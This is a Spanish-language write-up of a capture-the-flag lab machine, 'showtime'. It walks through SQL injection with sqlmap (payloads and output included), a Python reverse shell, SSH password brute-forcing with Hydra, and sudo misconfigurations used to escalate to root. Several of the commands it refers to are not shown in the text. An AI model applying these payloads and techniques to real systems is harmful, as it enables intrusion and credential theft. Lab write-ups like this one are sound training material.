Cuando obtenemos el .zip nos lo pasamos al entorno en el que vamos a empezar a hackear la maquina y haremos lo siguiente.
unzipshowtime.zip
Nos lo descomprimira y despues montamos la maquina de la siguiente forma.
bashauto_deploy.shshowtime.tar
Info:
## .
## ## ## ==
## ## ## ## ===
/""""""""""""""""\___/ ===
~~~ {~~ ~~~~ ~~~ ~~~~ ~~ ~ / ===- ~~~
\______ o __/
\ \ __/
\____\______/
___ ____ ____ _ _ ____ ____ _ ____ ___ ____
| \ | | | |_/ |___ |__/ | |__| |__] [__
|__/ |__| |___ | \_ |___ | \ |___ | | |__] ___]
Estamos desplegando la máquina vulnerable, espere un momento.
Máquina desplegada, su dirección IP es --> 172.17.0.2
Presiona Ctrl+C cuando termines con la máquina para eliminarla
Por lo que cuando terminemos de hackearla, le damos a Ctrl+C y nos eliminara la maquina para que no se queden archivos basura.
Escaneo de puertos
Info:
Si entramos al puerto 80 veremos una pagina normal, pero si entramos al login y probamos a meter credenciales por defecto, veremos que no va a funciona, pero vamos a probar a realizar un SQL Injection de forma super basica.
Y veremos esto:
Vemos que funciona, por lo que vamos a realizar un SQL Injection.
sqlmap
Vamos a capturar la peticion del login metiendo credenciales normales como admin:admin y con BurpSuite capturamos la peticion, lo guardamos en un request.txt de la siguiente forma:
request.txt
Info:
Vemos que ha funcionado y veremos las bases de datos de SQL, por lo que ahora vamos a ver que tablas contiene la base de datos llamada users.
Info:
Vemos que solo hay una tabla llamada usuarios, ahora vamos a ver que columnas contiene dicha tabla para ver la informacion que contiene.
Info:
Vemos varias credenciales de dicha tabla, por lo que vamos a probarlas por SSH, pero no tendremos suerte, pero si por ejemplo utilizamos las siguiente credenciales en la pagina web del login:
Veremos lo siguiente:
Escalate user www-data
Vemos que podemos ejecutar comandos de python3 por lo que haremos lo siguiente para generarnos una reverse shell.
Antes de enviarlo nos pondremos al a escucha:
Ahora le daremos a Ejecutar Comando para que envie la shell, si volvemos a donde tenemos la escucha veremos lo siguiente:
Ahora sanitizaremos la shell.
Sanitizacion Shell (TTY)
Escalate user joe
Si nos vamos a la carpeta /tmp veremos lo siguiente:
Info:
Vamos a leer el archivo .hidden_text.txt en el cual veremos lo siguiente:
Vemos que todo esta en mayuscula, por lo que vamos a pasarlo todo a minuscula y tirar un ataque de fuerza bruta por SSH con la lista de usuarios que hay en el sistema.
Hydra
users.txt
Ejecutamos lo siguiente, para pasarlo a minusculas:
pass.txt
Info:
Vemos que obtuvimos las credenciales del usuario joe, por lo que nos conectaremos por SSH de la siguiente forma.
SSH
Metemos como contraseña chittychittybangbang y veremos que estamos dentro con dicho usuario.
Escalate user luciano
Si hacemos sudo -l veremos lo siguiente:
Vemos que podemos ejecutar el binario posh como el usuario luciano, por lo que haremos lo siguiente:
Info:
Con esto seremos dicho usuario.
Escalate Privileges
Si hacemos sudo -l veremos lo siguiente:
Vemos que podemos ejecutar el script script.sh como el usuario root, pero vemos que esta en nuestra /home, por lo que podremos eliminar el script y crear el mismo con el contenido que queramos y ejecutarlo como root, haremos lo siguiente:
Ahora crearemos el mismo archivo pero con este contenido:
script.sh
Y lo ejecutaremos:
Info:
Ahora lo ejecutaremos de la siguiente forma:
Info:
Con esto veremos que seremos root por lo que habremos terminado la maquina.
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-09 11:34 CET
Nmap scan report for 172.17.0.2
Host is up (0.000029s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 e1:9a:9f:b3:17:be:3d:2e:12:05:0f:a4:61:c3:b3:76 (ECDSA)
|_ 256 69:8f:5c:4f:14:b0:4d:b6:b7:59:34:4d:b9:03:40:75 (ED25519)
80/tcp open http Apache httpd 2.4.58 ((Ubuntu))
|_http-server-header: Apache/2.4.58 (Ubuntu)
|_http-title: cs
MAC Address: 02:42:AC:11:00:02 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.33 seconds
___
__H__
___ ___[']_____ ___ ___ {1.8.11#stable}
|_ -| . ["] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assumeno liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 11:40:59 /2025-03-09/
[11:40:59] [INFO] parsing HTTP request from 'request.txt'
[11:40:59] [INFO] testing connection to the target URL
[11:40:59] [INFO] checking if the target is protected by some kind of WAF/IPS
[11:40:59] [INFO] testing if the target URL content is stable
[11:41:00] [INFO] target URL content is stable
[11:41:00] [INFO] testing if POST parameter 'usuario' is dynamic
[11:41:00] [WARNING] POST parameter 'usuario' does not appear to be dynamic
[11:41:00] [INFO] heuristic (basic) test shows that POST parameter 'usuario' might be injectable (possible DBMS: 'MySQL')
[11:41:00] [INFO] testing for SQL injection on POST parameter 'usuario'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[11:41:00] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:41:00] [WARNING] reflective value(s) found and filtering out
[11:41:00] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[11:41:00] [INFO] testing 'Generic inline queries'
[11:41:00] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[11:41:00] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
got a 302 redirect to 'http://172.17.0.2/login_page/home.php'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] N
[11:41:01] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[11:41:01] [INFO] POST parameter 'usuario' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)' injectable (with --string="DE")
[11:41:01] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[11:41:01] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[11:41:01] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[11:41:01] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[11:41:01] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[11:41:01] [INFO] POST parameter 'usuario' is 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)' injectable
[11:41:01] [INFO] testing 'MySQL inline queries'
[11:41:01] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[11:41:01] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[11:41:01] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[11:41:01] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[11:41:01] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[11:41:01] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[11:41:01] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[11:41:11] [INFO] POST parameter 'usuario' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[11:41:11] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[11:41:11] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[11:41:11] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[11:41:11] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[11:41:11] [INFO] target URL appears to have 3 columns in query
do you want to (re)try to find proper UNION column types with fuzzy test? [y/N] N
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
[11:41:11] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql')
[11:41:11] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[11:41:11] [INFO] testing 'MySQL UNION query (NULL) - 21 to 40 columns'
[11:41:11] [INFO] testing 'MySQL UNION query (random number) - 21 to 40 columns'
[11:41:11] [INFO] testing 'MySQL UNION query (NULL) - 41 to 60 columns'
[11:41:11] [INFO] testing 'MySQL UNION query (random number) - 41 to 60 columns'
[11:41:12] [INFO] testing 'MySQL UNION query (NULL) - 61 to 80 columns'
[11:41:12] [INFO] testing 'MySQL UNION query (random number) - 61 to 80 columns'
[11:41:12] [INFO] testing 'MySQL UNION query (NULL) - 81 to 100 columns'
[11:41:12] [INFO] testing 'MySQL UNION query (random number) - 81 to 100 columns'
[11:41:12] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
POST parameter 'usuario' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 350 HTTP(s) requests:
---
Parameter: usuario (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: usuario=admin' OR NOT 8838=8838#&contrase%C3%B1a=admin
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: usuario=admin' AND GTID_SUBSET(CONCAT(0x7170716b71,(SELECT (ELT(2407=2407,1))),0x7176787171),2407)-- QPsJ&contrase%C3%B1a=admin
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: usuario=admin' AND (SELECT 1600 FROM (SELECT(SLEEP(5)))RZVn)-- bLjg&contrase%C3%B1a=admin
---
[11:41:12] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.58
back-end DBMS: MySQL >= 5.6
[11:41:12] [INFO] fetching database names
[11:41:12] [INFO] retrieved: 'mysql'
[11:41:12] [INFO] retrieved: 'information_schema'
[11:41:12] [INFO] retrieved: 'performance_schema'
[11:41:12] [INFO] retrieved: 'sys'
[11:41:12] [INFO] retrieved: 'users'
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
[*] users
[11:41:12] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/172.17.0.2'
[*] ending @ 11:41:12 /2025-03-09/
___
__H__
___ ___["]_____ ___ ___ {1.8.11#stable}
|_ -| . ['] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assumeno liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 11:42:24 /2025-03-09/
[11:42:24] [INFO] parsing HTTP request from 'request.txt'
[11:42:24] [INFO] resuming back-end DBMS 'mysql'
[11:42:24] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: usuario (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: usuario=admin' OR NOT 8838=8838#&contrase%C3%B1a=admin
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: usuario=admin' AND GTID_SUBSET(CONCAT(0x7170716b71,(SELECT (ELT(2407=2407,1))),0x7176787171),2407)-- QPsJ&contrase%C3%B1a=admin
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: usuario=admin' AND (SELECT 1600 FROM (SELECT(SLEEP(5)))RZVn)-- bLjg&contrase%C3%B1a=admin
---
[11:42:24] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.58
back-end DBMS: MySQL >= 5.6
[11:42:24] [INFO] fetching database names
[11:42:24] [INFO] starting 5 threads
[11:42:24] [INFO] resumed: 'sys'
[11:42:24] [INFO] resumed: 'information_schema'
[11:42:24] [INFO] resumed: 'users'
[11:42:24] [INFO] resumed: 'mysql'
[11:42:24] [INFO] resumed: 'performance_schema'
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
[*] users
[11:42:24] [INFO] fetching tables for database: 'users'
[11:42:24] [INFO] retrieved: 'usuarios'
Database: users
[1 table]
+----------+
| usuarios |
+----------+
[11:42:24] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/172.17.0.2'
[*] ending @ 11:42:24 /2025-03-09/
listening on [any] 7777 ...
connect to [192.168.5.28] from (UNKNOWN) [172.17.0.2] 44748
$ whoami
whoami
www-data
script /dev/null -c bash
# <Ctrl> + <z>
stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=/bin/bash
# Para ver las dimensiones de nuestra consola en el Host
stty size
# Para redimensionar la consola ajustando los parametros adecuados
stty rows <ROWS> columns <COLUMNS>
cd /tmp
ls -la
total 20
drwxrwxrwt 1 root root 4096 Mar 9 07:54 .
drwxr-xr-x 1 root root 4096 Mar 9 07:33 ..
-rw-r--r-- 1 root root 894 Jul 22 2024 .hidden_text.txt
-rw-r--r-- 1 www-data www-data 206 Mar 9 07:54 temp_script.py
drwx------ 2 mysql mysql 4096 Jul 22 2024 tmp.w3E3JvWoeD
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-03-09 12:03:24
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 64 tasks per 1 server, overall 64 tasks, 234 login tries (l:3/p:78), ~4 tries per task
[DATA] attacking ssh://172.17.0.2:22/
[22][ssh] host: 172.17.0.2 login: joe password: chittychittybangbang
^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.
ssh joe@<IP>
Matching Defaults entries for joe on 16a18efc4706:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User joe may run the following commands on 16a18efc4706:
(luciano) NOPASSWD: /bin/posh
sudo -u luciano posh
luciano@16a18efc4706:/home/joe$ whoami
luciano
Matching Defaults entries for luciano on 16a18efc4706:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User luciano may run the following commands on 16a18efc4706:
(root) NOPASSWD: /bin/bash /home/luciano/script.sh
